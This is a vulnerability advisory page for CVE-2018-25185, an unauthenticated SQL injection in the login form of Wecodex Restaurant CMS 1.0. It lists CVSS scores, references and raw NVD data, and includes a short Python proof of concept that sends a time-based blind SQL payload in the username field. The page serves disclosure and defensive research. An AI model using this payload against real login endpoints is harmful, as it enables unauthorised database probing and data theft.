CVE-2018-25185

Description

Wecodex Restaurant CMS 1.0 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the username parameter. Attackers can send POST requests to the login endpoint with malicious SQL payloads using boolean-based blind or time-based blind techniques to extract sensitive database information.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:wecodex:restaurant_cms:1.0:*:*:*:*:*:*:* - VULNERABLE

Wecodex Restaurant CMS 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def check_sqli(url):
    # Target login endpoint
    target = url + "/login.php"
    
    # Payload for Time-Based Blind SQL Injection
    # Checks if the first character of database() is '5' (for MySQL 5.x)
    payload = {
        "username": "admin' AND IF(SUBSTRING(VERSION(),1,1)='5', SLEEP(5), 0)-- -",
        "password": "any_password"
    }

    try:
        print("[+] Sending payload to %s..." % target)
        response = requests.post(target, data=payload, timeout=10)
        
        # Check if response time is greater than 5 seconds
        if response.elapsed.total_seconds() >= 5:
            print("[+] Vulnerability Confirmed! Response time: %s seconds" % response.elapsed.total_seconds())
        else:
            print("[-] Vulnerability not detected.")
            
    except requests.exceptions.RequestException as e:
        print("[!] Error: %s" % e)

if __name__ == "__main__":
    # Replace with actual target URL
    target_url = "http://example.com"
    check_sqli(target_url)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2018-25185
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2018-25185
[3] CVE Details https://www.cvedetails.com/cve/CVE-2018-25185/
[4] VulDB https://vuldb.com/cve/CVE-2018-25185
[5] https://www.exploit-db.com/exploits/44730
[6] https://www.vulncheck.com/advisories/wecodex-restaurant-cms-sql-injection-via-login
[7] https://www.wecodex.com/item/view/restaurant-system-in-php-and-mysql/6

Raw JSON Data

JSON

{"cve": {"id": "CVE-2018-25185", "sourceIdentifier": "[email protected]", "published": "2026-03-26T12:16:04.270", "lastModified": "2026-03-27T21:00:41.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wecodex Restaurant CMS 1.0 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the username parameter. Attackers can send POST requests to the login endpoint with malicious SQL payloads using boolean-based blind or time-based blind techniques to extract sensitive database information."}, {"lang": "es", "value": "Wecodex Restaurant CMS 1.0 contiene una vulnerabilidad de inyección SQL que permite a atacantes no autenticados manipular consultas de base de datos inyectando código SQL a través del parámetro username. Los atacantes pueden enviar solicitudes POST al endpoint de inicio de sesión con cargas útiles SQL maliciosas utilizando técnicas ciegas basadas en booleanos o ciegas basadas en tiempo para extraer información sensible de la base de datos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wecodex:restaurant_cms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "1D383274-96A4-404E-AB84-75B98F79922C"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/44730", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/wecodex-restaurant-cms-sql-injection-via-login", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.wecodex.com/item/view/restaurant-system-in-php-and-mysql/6", "source": "[email protected]", "tags": ["Broken Link"]}]}}